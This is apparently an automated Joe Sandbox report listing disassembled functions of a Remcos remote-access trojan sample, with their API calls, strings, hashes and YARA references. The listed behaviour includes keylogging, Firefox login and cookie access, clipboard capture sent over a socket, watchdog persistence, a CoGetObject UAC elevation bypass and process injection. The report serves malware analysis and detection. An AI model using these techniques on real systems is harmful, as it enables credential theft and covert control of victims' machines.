                                                              • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                              • Opcode Fuzzy Hash: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                                              • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                              Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                              • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                              • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                              • API String ID: 3018269243-13974260
                                                              • Opcode ID: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                                              • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                              • Opcode Fuzzy Hash: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                                              • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                              Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                              • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                              • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$CloseFile$FirstNext
                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                              • API String ID: 1164774033-3681987949
                                                              • Opcode ID: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                              • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                              • Opcode Fuzzy Hash: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                              • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                              Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenClipboard.USER32 ref: 004168FD
                                                              • EmptyClipboard.USER32 ref: 0041690B
                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                              • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                              • CloseClipboard.USER32 ref: 00416990
                                                              • OpenClipboard.USER32 ref: 00416997
                                                              • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                              • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                              • CloseClipboard.USER32 ref: 004169BF
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                              • String ID: !D@
                                                              • API String ID: 3520204547-604454484
                                                              • Opcode ID: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                                              • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                              • Opcode Fuzzy Hash: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                                              • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                              Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                              • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                              • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                              • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$Close$File$FirstNext
                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                              • API String ID: 3527384056-432212279
                                                              • Opcode ID: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                              • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                              • Opcode Fuzzy Hash: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                              • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                              Function 0040F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                              • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                              • API String ID: 3756808967-1743721670
                                                              • Opcode ID: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                                              • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                              • Opcode Fuzzy Hash: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                                              • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                              Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$1$2$3$4$5$6$7$VG
                                                              • API String ID: 0-1861860590
                                                              • Opcode ID: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                                              • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                              • Opcode Fuzzy Hash: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                                              • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                              Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0040755C
                                                              • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Object_wcslen
                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                              • API String ID: 240030777-3166923314
                                                              • Opcode ID: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                              • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                              • Opcode Fuzzy Hash: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                              • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                              Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                              • GetLastError.KERNEL32 ref: 0041A84C
                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                              • String ID:
                                                              • API String ID: 3587775597-0
                                                              • Opcode ID: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                                              • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                              • Opcode Fuzzy Hash: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                                              • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                              Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                              • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                              • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                              • String ID: JD$JD$JD
                                                              • API String ID: 745075371-3517165026
                                                              • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                              • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                              • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                              • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                              Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                              • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                              • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$CloseFile$FirstNext
                                                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                              • API String ID: 1164774033-405221262
                                                              • Opcode ID: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                                              • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                              • Opcode Fuzzy Hash: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                                              • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                              Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C41F
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C42C
                                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C44D
                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C473
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                              • String ID:
                                                              • API String ID: 2341273852-0
                                                              • Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                              • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                              • Opcode Fuzzy Hash: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                              • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                              Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Find$CreateFirstNext
                                                              • String ID: 8SG$PXG$PXG$NG$PG
                                                              • API String ID: 341183262-3812160132
                                                              • Opcode ID: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                                              • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                              • Opcode Fuzzy Hash: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                                              • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                              Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                              • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                              • GetLastError.KERNEL32 ref: 0040A328
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                              • TranslateMessage.USER32(?), ref: 0040A385
                                                              • DispatchMessageA.USER32(?), ref: 0040A390
                                                              Strings
                                                              • Keylogger initialization failure: error , xrefs: 0040A33C
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                              • String ID: Keylogger initialization failure: error
                                                              • API String ID: 3219506041-952744263
                                                              • Opcode ID: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                                              • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                              • Opcode Fuzzy Hash: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                                              • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                              Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 0040A451
                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                              • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                              • GetKeyState.USER32(00000010), ref: 0040A46E
                                                              • GetKeyboardState.USER32(?), ref: 0040A479
                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                              • String ID:
                                                              • API String ID: 1888522110-0
                                                              • Opcode ID: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                                              • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                              • Opcode Fuzzy Hash: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                                              • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                              Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                              • API String ID: 2127411465-314212984
                                                              • Opcode ID: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                                              • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                              • Opcode Fuzzy Hash: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                                              • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                              Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00449292
                                                              • _free.LIBCMT ref: 004492B6
                                                              • _free.LIBCMT ref: 0044943D
                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                              • _free.LIBCMT ref: 00449609
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                              • String ID:
                                                              • API String ID: 314583886-0
                                                              • Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                              • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                              • Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                              • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                              Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                              • String ID: !D@$PowrProf.dll$SetSuspendState
                                                              • API String ID: 1589313981-2876530381
                                                              • Opcode ID: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                                              • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                              • Opcode Fuzzy Hash: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                                              • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                              Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                              • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
